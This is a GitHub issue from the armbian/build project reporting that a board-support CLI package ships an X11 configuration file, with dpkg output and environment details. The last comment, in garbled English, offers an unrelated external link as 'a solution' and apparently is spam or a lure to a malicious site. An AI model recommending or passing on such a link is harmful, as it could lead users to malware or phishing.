armbian/build #7985: [Bug]: -bsp-cli- package ships X11 stuff

leggewie, 2025-03-21:
### What happened?

The following looks suspicious:

```
banana:~:% dpkg -L armbian-bsp-cli-bananapim2plus-current|grep X11
/etc/X11
/etc/X11/xorg.conf.d
/etc/X11/xorg.conf.d/01-armbian-defaults.conf
```

### How to reproduce?

dpkg -L armbian-bsp-cli-bananapim2plus-current|grep X11

adjust for your SBC

### Branch

main (main development branch)

### On which host OS are you running the build script and observing this problem?

Ubuntu 24.04 Noble

### Are you building on Windows WSL2?

- [ ] Yes, my Ubuntu/Debian/OtherOS is running on WSL2

### Code of Conduct

- [x] I agree to follow this project's Code of Conduct

EvilOlaf, 2025-03-22:
and?

juggerindentity, 2025-04-20:
I may I might a solution to your issue. Check it out here [click](https://forreststonesolutions.com/robots/)